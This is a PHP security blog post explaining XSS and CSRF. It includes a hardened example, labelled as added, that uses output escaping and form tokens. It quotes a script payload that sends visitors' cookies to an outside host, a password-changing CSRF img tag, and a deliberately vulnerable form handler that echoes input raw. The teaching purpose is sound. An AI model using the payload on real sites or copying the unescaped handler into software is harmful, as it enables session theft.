Security should be at the forefront of all developers' minds these days, and XSS has been coming up as the latest technique used to extract personal information from your users.

There are two things you need to be concerned about when developing against these attacks:
XSS and CSRF
"Cross Site Scripting" and "Cross Site Request Forgery"

Defending against these attacks in PHP can be fairly simple, yet it is often overlooked. In XSS the attacker attempts to inject JavaScript into your application to do malicious harm. So what? What are a few alert boxes going to do besides bother my users? Here is the most common of the serious attacks:

1. A user posts something into your forum that contains JavaScript such as <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>
2. That sits in the database until another user comes along and reads the post on your forum. When they do, they are redirected to the attacker's site, handing over the cookie data for their current session, and then redirected back to the original site so they have no idea anything happened. The attacker can then use that session to get into the site as that user.

That is a fairly simple attack to carry out, and it has a high success rate on many sites I've come across.
Here is a great guide to all the attack vectors someone can take against your site: http://ha.ckers.org/xss.html

The other attack to worry about is called Cross Site Request Forgery (CSRF), which is just as nasty and harder to combat. Think of this situation... someone wants you to post a message, so your "friend" sends you a link to a site he just posted something on. On that site he was able to inject his own img tag, such as <img src="http://goodsite.com?mysettings.php?changepassword=newpass">. Now the victim's browser requests that page as the victim, with their own session, and the attacker can make people do things on websites they never intended to do :)

I'm working on how to show a POST exploit of this attack; so far I've only seen GET exploits. A great tip I got from Chris Shiflett is adding a "token" to all of your web forms. Store that token in session data and compare the two on form submission; if they do not match, the request might not have come from a valid user.

So how do I stop XSS?
There are several methods you can take to diminish the success of XSS attacks. But let's take a sample vulnerable application. We're just going to put up a form, let someone enter some text, store that text in a flat file and then echo out what they typed. I'm going to assume magic quotes are on, as they are on most shared hosts, and PHP 4.


<?php
if($_POST['post'] != '') {
    $fp = fopen('posts.txt', 'a');   // flat file name is an assumption; the original line ends at "$fp ="
    fwrite($fp, $_POST['post'] . "\n");
    fclose($fp);
    echo $_POST['post'];             // echoed back unescaped: this is the XSS hole described above
}
?>
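The same flat-file form with the two defences the post describes applied: escaping on output to stop the injected <script> from running, and a per-session form token that the handler checks before accepting a POST. This is an added example, not the original post's code, and it assumes PHP 7 or later (random_bytes, hash_equals, the ?? operator), magic quotes off, and a placeholder storage file named posts.txt next to the script.

```php
<?php
// Added example (not the original post's code): the flat-file form above,
// hardened against XSS (escape on output) and CSRF (per-session form token).
// Assumptions: PHP 7+ (random_bytes, hash_equals, ??), magic quotes off,
// and a placeholder storage file "posts.txt" next to the script.
session_start();
define('POST_FILE', __DIR__ . '/posts.txt');
// One token per session: the form carries it in a hidden field and the
// handler refuses any POST whose token does not match the session copy.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
// Escape at the point of OUTPUT. The stored text stays raw; the browser
// receives &lt;script&gt; rather than a live <script> element.
function e($s) {
    return htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function csrf_token_is_valid($submitted) {
    // hash_equals is a constant-time comparison; both sides must be strings.
    return isset($_SESSION['csrf_token']) && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_token_is_valid($_POST['token'] ?? null)) {
        http_response_code(403);
        exit('Form token missing or invalid');
    }
    $text = trim($_POST['post'] ?? '');
    if ($text !== '') {
        // One post per line: flatten newlines so a post cannot span records.
        $line = str_replace(["\r", "\n"], ' ', $text) . "\n";
        file_put_contents(POST_FILE, $line, FILE_APPEND | LOCK_EX);
    }
}
?>
<form method="post" action="">
  <input type="hidden" name="token" value="<?= e($_SESSION['csrf_token']) ?>">
  <textarea name="post"></textarea>
  <button type="submit">Post</button>
</form>
<?php
// The original sample does: echo $_POST['post'];  (raw, so <script> runs).
// Hardened: every stored line goes through e() before it reaches the page.
$posts = is_file(POST_FILE) ? file(POST_FILE, FILE_IGNORE_NEW_LINES) : [];
foreach ($posts as $post) {
    echo '<p>' . e($post) . "</p>\n";
}
```

A forged cross-site POST (the img-tag trick above, or a hidden form on the attacker's page) cannot read the victim's session token, so it fails the hash_equals check with a 403 before anything is written.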


Follow Me @jimplush